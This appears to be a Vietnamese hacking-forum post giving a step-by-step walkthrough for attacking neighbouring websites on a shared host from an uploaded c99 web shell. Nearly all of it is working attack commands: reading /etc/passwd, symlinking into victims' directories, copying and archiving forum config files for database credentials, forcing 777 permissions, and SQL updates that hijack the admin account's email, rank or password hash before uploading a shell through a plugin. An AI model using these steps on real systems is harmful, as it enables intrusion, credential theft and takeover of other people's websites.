1 cài câu lệnh phổ biến cho ae NB, và dể hiễu
PHP Code:
cat /etc/passwd : liệt kê các user có trên server
PHP Code:
dir /home/user/public_html/ : đi đến public_html của user
PHP Code:
ln -s /home/user/public_html/index.php hehe.txt : ghi file index.php vào file hehe.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/hehe.txt
Vậy muốn ghi con shell của mình vào host người khác thì làm sao ??
PHP Code:
ln -s /home/user_của_mình/public_html/c99.php /home/user_của_victim/public_html/c99.php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé
_Nếu bị chmod ko cho ghi thì sao ??
=>Thì dir qua web nó rồi run command típ
_Nếu wa web nó ko run đc thì sao ?
=>thì xem web nó có forum hay cái gì đó ko mình úp shell thông qua lỗi ảnh hoặc úp wa forum
-vậy phải làm sao để xem đc file config để vào được database ?
PHP Code:
cat /home/user/public_html/forum/includes/config.php >> xem file config.php
_Nếu ko xem được thì sao ??,diss các hàm và éo có symljnk ??
=> thì download website nó về mà ngâm cứu config
PHP Code:
tar -czf hehehe.tar.gz /home/user/public_html/forum/
>> download nguyên cái forum
ko thì download cái config nó thôi.
PHP Code:
tar -czf config.tar.gz /home/user/public_html/forum/includes/config.php
_Nếu lệnh zip ko được nữa thì sao ,config mã hóa thì sao
thì xem cách mã hóa
hiện tại có 2 cái dezend và base64_decode ,xem google thì bít
nếu zip ko đc chắc bó tay quá >> đỗi cách khác (nói lăng nhăng quá mình bỏ wa bước này )
Vậy nếu có user+pass+data mà đăng nhập ko được ,đăng nhập đc mà ko zip đc thì làm sào sữa đc mà vào admin úp shell trên forum ??
=>Con shell mình đang dùng ko phải là root nên rất hạn chế
1 vài lệnh cải thiện :
PHP Code:
chmod a+wxr file.php -rwxrwxrwx chmod a+drw file.php -rwxrwxrwx chmod -R a+rx thumuc >> giao quyen doc va vao ben trong thu muc,ke ca thu muc con
chmod -R a+rw thumuc >> giao quyen doc va ghi...
chmod -R a+rwx thumuc >> quyen root
mkdir backup >> tạo thư mục backup
chmod 777 backup >> chmod nó thành 777 để mình zip data.zip lên
_Nếu ko chmod 777 được thì làm sao ?
=> tạo con chmod.php nội dung như sau:
Quote:
PHP Code:
<?php chmod("backup", 0777); ?>
úp lên rồi run
http://abc.com/chmod.phpsau đó úp con dumper.php lên rồi điền info vào zip ,zip xong có thể về localhost chỉnh sữa rồi úp lên => backup thế là mình đã quản lí
-Cách này lằng nhằng quá ,data nó cả trăm M thì phiền ?
vậy thì dùng con c99.php ,vào chổ nào có user mà chỉnh sữa
ví dụ nó có bảng user bao gồm id và email ,....thì run command trên SQL của data là
PHP Code:
update user set email="hehehe@yahoo.com" where id=1
nếu user admin nó có id là 1,đã thay thế =
hehehe@yahoo.com>> sau đó chơi quên mật khẩu gửi user+pass về email
hehehe@yahoo.comhoặc
Quote:
PHP Code:
update user set id ='6'where user='hehehe'
>> set user hehehe lên thẳng admin (vào reg nick hehehe trước nhá)
hoặc
Quote:
PHP Code:
update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=1
>> e10adc3949ba59abbe56e057f20f883e = 123456 >> vào mà đăng nhập user=admin_của_nó ;pass =123456
mấy bước làm sao thì ae kím clip xem sẽ hiễu
>> up qua style hoặc plugin gì gì đó là đc thôi
Chơi thôi đừng quá hoại gì!